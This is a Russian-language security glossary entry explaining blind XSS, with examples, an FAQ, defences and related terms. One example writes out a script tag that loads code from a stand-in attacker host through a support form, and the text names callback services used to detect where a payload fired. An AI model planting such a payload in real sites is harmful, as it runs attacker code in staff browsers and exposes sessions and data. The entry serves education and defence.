Слепой XSS
Что такое Слепой XSS?
Слепой XSSРазновидность хранимого XSS, в которой полезная нагрузка срабатывает в недоступном злоумышленнику контексте, обычно во внутренней админ-панели.
Слепой XSS — подкласс хранимого XSS: вредоносный скрипт выполняется не в браузере атакующего, а в ином, как правило привилегированном контексте — окне обращения в поддержку, консоли антифрод-проверки, внутренней панели или отчёте бэкапа. Атакующий отправляет полезную нагрузку через публичную форму (контакт, регистрация, тикет) и ждёт, пока сотрудник откроет сохранённые данные. Обнаружение основано на внеполосных callback'ах: нагрузка отправляет информацию на XSS Hunter, Burp Collaborator или собственный DNS/HTTP-сервер, раскрывая, где сработал скрипт. Защита совпадает с защитой от хранимого XSS плюс строгая CSP для админ-инструментов.
● Примеры
- 01
Поле формы поддержки со <script src=https://x.attacker/x.js></script>, срабатывающее в CRM оператора.
- 02
Заголовок User-Agent, отображаемый в админ-просмотрщике логов без HTML-кодирования.
● Частые вопросы
Что такое Слепой XSS?
Разновидность хранимого XSS, в которой полезная нагрузка срабатывает в недоступном злоумышленнику контексте, обычно во внутренней админ-панели. Относится к категории Атаки и угрозы в кибербезопасности.
Что означает Слепой XSS?
Разновидность хранимого XSS, в которой полезная нагрузка срабатывает в недоступном злоумышленнику контексте, обычно во внутренней админ-панели.
Как работает Слепой XSS?
Слепой XSS — подкласс хранимого XSS: вредоносный скрипт выполняется не в браузере атакующего, а в ином, как правило привилегированном контексте — окне обращения в поддержку, консоли антифрод-проверки, внутренней панели или отчёте бэкапа. Атакующий отправляет полезную нагрузку через публичную форму (контакт, регистрация, тикет) и ждёт, пока сотрудник откроет сохранённые данные. Обнаружение основано на внеполосных callback'ах: нагрузка отправляет информацию на XSS Hunter, Burp Collaborator или собственный DNS/HTTP-сервер, раскрывая, где сработал скрипт. Защита совпадает с защитой от хранимого XSS плюс строгая CSP для админ-инструментов.
Как защититься от Слепой XSS?
Защита от Слепой XSS обычно сочетает технические меры и операционные практики, как описано в определении выше.
Какие есть другие названия Слепой XSS?
Распространённые альтернативные названия: Внеполосный XSS.
● Связанные термины
- attacks№ 240
Межсайтовый скриптинг (XSS)
Веб-уязвимость, позволяющая злоумышленнику внедрять вредоносные скрипты на страницы, просматриваемые другими пользователями, и выполнять их в браузере жертвы под источником сайта.
- attacks№ 1107
Хранимый XSS
Постоянная межсайтовая скриптинг-уязвимость: вредоносный скрипт сохраняется на сервере и выполняется в браузере каждого посетителя.
- attacks№ 912
Отражённый XSS
Непостоянный XSS, при котором подконтрольный атакующему ввод сразу отражается в ответе и исполняется в браузере жертвы.
- attacks№ 347
DOM-XSS
Разновидность XSS, при которой внедрение и выполнение целиком происходят в браузере: клиентский JavaScript записывает недоверенные данные в опасный DOM-приёмник.
- appsec№ 214
Политика безопасности контента (CSP)
HTTP-заголовок ответа, указывающий браузеру, какие источники скриптов, стилей, фреймов и других ресурсов допустимы, что снижает последствия XSS и инъекций данных.
- appsec№ 773
Кодирование вывода
Преобразование недоверенных данных в безопасную для конкретного контекста вывода (HTML, JavaScript, URL, SQL, shell) форму, чтобы они не вырвались и не выполнились как код.